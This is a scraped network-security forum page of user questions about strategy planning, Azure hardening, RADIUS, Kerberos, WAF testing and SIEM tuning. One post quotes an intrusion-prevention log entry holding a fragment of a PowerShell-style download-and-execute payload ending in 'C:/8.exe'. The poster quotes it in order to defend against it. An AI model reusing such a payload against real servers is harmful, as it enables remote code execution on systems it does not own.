Network Security

Network security consists of the policies adopted to prevent and monitor authorized access, misuse, modification, or denial of a computer network and network-accessible resources. Network security involves the authorization of access to data in a network, and covers a variety of computer networks; conducting transactions and communications among businesses, government agencies and individuals. Networks can be private, such as within a company, and others which might be open to public access.

Share tech news, updates, or what's on your mind.

Sign up to Post

hi guys

I'm currently trying to put a plan together to senior management for a strategy for their infrastructure and security. I have only just been hired for the project. My role is to provide leadership for the infrastructure and security teams.  I know exactly what I need to do, but my issue is that I'm trying to put this into a structured plan to follow in steps, but articulating this properly has been a bit of a challenge. The purpose of the plan is to liaise with important stakeholders to understand the vision/mission of the business goals in order for I.T to better support them.

At the moment, I've gone and met people in the teams and asked them about how things work, the infrastructure and the security in place. But, that's not part of a structured method/plan.

For example, I am setting the plan together in phases. In the first phase, I want it to be the understanding phase. So something like 'meet with direct reports'. Then 'understand from direct reports, their roles and responsibilities by spending two hours in the first week with them'.

Then something like 'exploring vulnerabilities across all verticals to identify shortfalls affecting productivity....' (or anything similar'.

The purpose is to expand this into phases, so that I can come up with a conclusion and show senior people as to what I will do in the next X number of months.

Do you guys have any plans you created or know of any good structure that is out there which can be …
Angular Fundamentals
LVL 13
Angular Fundamentals

Learn the fundamentals of Angular 2, a JavaScript framework for developing dynamic single page applications.

Is there Checkpt Gaia & Fortigate hardening guidelines?

If there is, can point me to where to download & if there's none,
a paper from the principals recommending not to harden  them
is appreciated.
Need advice for preventing malware from taking advantage of USB ports on a computer/server, etc.  are Chromebooks vulnerable?

Also, is their a safe way to determine if a usb device is compromised?   Or to check if your computer has been infected?
I'm a little overwhelmed with all the security features to help secure an Azure environment and VMs.

Our developers are creating a web app that, currently, will live on a single VM and we may have a few VMs. In the future as the application grows we will separate the services.

So far I have enabled the security center and I was thinking of enabling JIT Access and I found a PS script that will create an RBAC role where I can put specific users in and then another PS script so that they can enable ports for a specific time,  but our developers use Linux and I don't know if that script will work even with powershell core installed on Ubuntu.

They have Rapid7 and Qualys end points for vulnerability scanning but I'm not sure if that is needed. I was trying to look for an IPS/IDS end point but I am not familiar with whats on Azure nor if it will be expensive.

I'm looking for practical solutions. I've read the Azure docs and they can get a little confusing.

Thank you,
A client has an Excel file that would use URLDownloadFile to download an image from a webpage.

The file worked for an entire year, but last week, after a network change at his work, his file no longer downloads the image.

He can access the image by pasting the link in internet explorer, but the code just won't import anymore.

I apologize as I can't paste his code or the websites he uses, so am wondering if you can list network changes that can cause this and some bullet proof code that you would use.
hi guys

So I'm about to work on a project for a firm and one of the people I am going to be interviewing is a CISO. I will be directing the strategy and implementation of the infrastructure and security. The CISO will report directly to me. This individual has highlighted the following areas as their strengths:

IT Security & Information Assurance
Data Protection, EU GDPR, Privacy & Online Safety
Governance and regulatory compliance
Security Incident Response, e-litigation & RCA
CyberEssentials, NIS directive, CoCo, PCI DSS

I have some questions of my own. But I wanted broader perspectives from people like you. So if you had the opportunity to ask some questions from such an individual, what sort of questions would you ask them in order to understand the spectrum of their security understanding/experience?

Thanks for helping
Hi guys

I want to do a course in Cybersecurity with someone who knows their stuff backwards and whom I could learn a lot from from their teaching.  I'm a member of Pluralsight, which is great too. But I have worked with some talented people and you can learn exponentially with an absolute 'don' who knows how and what to teach. Do you guys know of names of individuals, whether on here or in and around London who you would highly recommend learning from and whom offer their time to do so?


Pending our hardware arrival & clearing change control, we're considering the above
Free proxy.  If anyone has used it, mind sharing:

a) if it can do whitelisting & ban/blacklistings?  Basically I would like to create a
    whitelist of about 120 trusted websites & then every other websites will be
    banned/barred from access

b) For the 120 sites, may need wildcards in front/back

c) for the barred sites, when users load them, it'll launch a secure browser
I am in the process of changing out a file server.  It is the only server on the network.
Access to the internet is through a WatchGuard XM25 appliance
The Domain name is the same, but the DNS has changed.  The WatchGuard provided internet connection for a few minutes, and now there is no internet connection.  I can remote into the network with the WatchGuard SSL-VPN utility, and access the computers.  

Any thoughts on why I cannot access the internet from behind the WatchGuard Appliance?

The old server was 2008R2 and the new server is 2016Standard

As far as I understand our current set-up:-

We have a WPA2 Enterprise wireless solution.  The AP's act as Radius Clients and connecting devices use PEAP to connect valid domain users via RADIUS (currently running on Server 2012 R2) using their domain credentials.

There is a server-side certificate which I believe is used for encrypting the session.

I have been asked to move to a pure certificate based solution (i.e. certificate on both server and client and no more authentication necessary) and I am not sure how best to set this up.  We have our own PKI.

Can anyone point me in the direction of any good quality information about how I would set RADIUS up to work in this way?

I have noticed an unchecked box in Radius that says "Disconnect Clients without Cryptobinding" but I can't find a lot of documentation about what that means and what checking it would change.

I have also noticed that we are using the Domain Users group to validate users, but imagine we could use Domain Computers instead.  How secure would that be?  Does the device actually do some authentication or could another device with the same name connect with that setting?

I've also seen a number of things indicating that MS-CHAP and MS-CHAP-V2 are essentially worthless. so how do I avoid using these?

If anyone can point me at any great documentation for setting something like this up in a more secure way, I would find that really helpful.

Not an expert in these areas, so any …
Active Protection takes the fight to cryptojacking
Active Protection takes the fight to cryptojacking

While there were several headline-grabbing ransomware attacks during in 2017, another big threat started appearing at the same time that didn’t get the same coverage – illicit cryptomining.

Which can be a good software to monitoring the network, for example to know which computer is using alot of data in the network

Free or buy
I've noticed that all of my web servers were logging this block below from my host intrusion prevention system.  For privacy, assume this particular webserver has a dns name of'','C:/8.exe');start%20C:/8.exe

Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targetting?
My employer wants the ability to disable an AD account and have assurance the end user's access to email and network resources is immediately or quickly revoked. We tested this earlier this morning and discovered although email access to Exchange is almost immediately unavailable, the end user still has access to critical and sensitive data through mapped drives. I've got the impression this is because the end user still has a kerberos ticket cached on their PC. What is the best practice to mitigate this risk? Should we modify the kerberos ticket lifetime on the 2012R2 Domain Controller, or some other method? Thanks!
Our employees on the road have laptops with LTE connection and want to narrow their internet usage to only a few sites or category’s I came across this site which seems good but is pricy.

What I like about this site is they have a lot of categories to choose from, which others like windows parental control or NetNanny do not offer.

I would not go with Norton for example, since I don’t want their security firewall.

OpenDNS would be the one I would go, but in this case, it will not work, since you need to use their DNS and with LTE, you cannot change the DNS.

Any recommendations
I am building a lab in my apartment.

I'm a student. I have a ton of Linux servers but no Windows servers. So I have a few questions

1. I am a student. Do I need to pay by the core or do they have a free student license?
2. Which version of Windows server should I get?
3. Will this verison have a GUI? Should I use a GUI. Very comfortable with Unix shell. I would like to learn Powershell but also just want an overview of Windows server.
4. How do I connect to Windows server from a Linux machine?
5. I want to specialize in network security. What should my goals be running Windows server? What do I need to learn and get a good overview of?

I have added a lot of tags and plan to keep this question open for a while, especiallly from the NetSec people.
I need tools / ways to test our new WAF (to be set up in UAT VLAN) for
a) Brute Force : what's the commands/syntax if I use Jack the Ripper or any other suggested tool?
b) DDoS volumetric & application
c) OWASP top 10 (eg: XSS, SQL injection, CSRF, Cross-Frame-Site-Forgery/Clickjacking, insecure file upload)
d) Rate-Limiting : can I use the command line browser  'wget' to load a page many times to simulate?
e) any other aspects to test?
f) virtual patching (eg: if a patch is not applied & the WAF has a rule/signature for Wordpress/PHP)

I don't have access to Kale Linux (but possibly an RHEL VM in UAT) to run Metasploit: hopefully there's
a Metasploit for RHEL (but do suggest how to use it to test)

When adding an IP to an outside interface on a Cisco ASA,  what IP information do i need from my ISP

I believe its just an public IP address and subnet mask? Do I need a gateway address?

I need to allow access to a remote ip to be able to manage the config on my Cisco 5506. What's the best way?

Over the last few weeks I've noticed our DNS filter blocking the same address many times and the address is similar to our domain which is a little concerning.  I'm seeing blocked attempts to access  From what I can tell that looks like a Russian hosting service.  DNS Lookup shows the ip as ran by Webazilla B.V. which from what I can find is in the Netherlands.  We do have a techy Russian employee who was my first thought and after investigating he was using Yandex which is a Russian browser of some sort.  I thought the issue was tied to Yandex which was installed on three different computers.  I removed all instances and DNS filter logs were clean for a couple days.  Before I went on leave I setup local DNS logging and when I returned I'm seeing alot of blocked attempts to the same source.  I tried looking through logs on the Cisco firewall but I couldn't recreate the issue to help point me to the culprit.  The firewall was reporting our DNS filter IP instead of the questionable IP when I try recreating the issue.  Moving on to the DNS logs, I will attach a sample of the logs but i'm seeing this from multiple IP addresses on our network now.  One computer I re-imaged right before my leave and another laptop that i'm pretty certain the user practices above average password and security policies. All of the computers on the network are running Kaspersky Endpoint.  Any help would be much appreciated!

Notes about computer IPs shown in the logs.
CEOs need to know what they should worry about
CEOs need to know what they should worry about

Nearly every week during the past few years has featured a headline about the latest data breach, malware attack, ransomware demand, or unrecoverable corporate data loss. Those stories are frequently followed by news that the CEOs at those companies were forced to resign.

I am setting up our infrastructure to enable remote phones on a new phone system we installed. The phone vendor requirements were fairly simple, port forward UDP 443 to a device on our DMZ(the virtual machine). Easy, or so I thought.

Everything looks good from the Firewall end. If I plug in the phone, I can see the traffic hit the firewall, and be forwarded to the device lets say is No issues I can see from the firewall end. It's a Barracuda NG F280, I have gone over it over and over with Barracuda support and they see nothing from their end.

The issue is that traffic never hits I have set up a monitoring VM on my DMZ with wireshark, never see the traffic. The VM has a packet monitor built in so I can create packet captures on the interface directly, never see the traffic. If I run a netcat cmd for UDP 443, I see nothing. I see other traffic. If I ping from anywhere else on the network, I see it. There is nothing between this device and the Firewall, except the VMWare hypervisor.

I am at a loss at this point. My Firewall vendor says it isn't on their end, my phone vendor says it isn't on theirs. I believe that to be the truth, but I don't know what else it could be. Does anyone have any ideas? Only thing I can think of is something in VMWare, but I have never seen VMWare block traffic like that before.

Some more info:

Seems localized in some way to port number. If I change my forwarding rule to port 3300 instead…
One of the Big 4 consulting firm has strongly advocated 2FA to be used if
we are on O365 Exchange online as they had seen quite a few incidents
that could have been prevented if users of O365 uses 2FA.

if secure email (eg: HP Voltage & one of those where users have to login
to a portal to retrieve the encrypted emails) are used, will this mitigate
such issues as serve as good replacement for 2FA ?

Does O365 offers secure email feature or add-on (like HP's Voltage)?

We have move to 0365 and the exchange online protection is not very effective. We are planning to go with 3rd party spam filtering system. .

We are a education establishment .Please post e any good products that you are aware of.

I'm exploring if Rapid 7 can be used to track patch status (what patches are applied on which dates
& which ones have been released but yet to be applied) of our Solaris, RHEL 6/7 & Windows servers
as well as configuring it to do weekly scan of CIS hardenings (including for Cisco switches/routers).

Any document/materials on how to configure to check for patch status & CIS hardenings are
much appreciated.
Refer to attached:
need to clarify on the red-text items in the excel :
what are the usual industry-practice settings like
whether "occurs 10 times/minute" : is this the usual
setting or hackers usually will attempt 5 times/0.5min?

From our network IPS logs, have seen variations in
attempts (by blacklisted source IP addrs) in making
3-10 attemps over various time horizons.

Appreciate any comments/inputs on the red-text
items in the attached use cases which we're going
to adopt to finetune our SIEM/SOC
Token Based Authentication and the .NET Stack

What can you tell me about the built-in capabilities of .NET Stack to use Token Based Authentication  and also Token Based Authentication in general??

Network Security

Network security consists of the policies adopted to prevent and monitor authorized access, misuse, modification, or denial of a computer network and network-accessible resources. Network security involves the authorization of access to data in a network, and covers a variety of computer networks; conducting transactions and communications among businesses, government agencies and individuals. Networks can be private, such as within a company, and others which might be open to public access.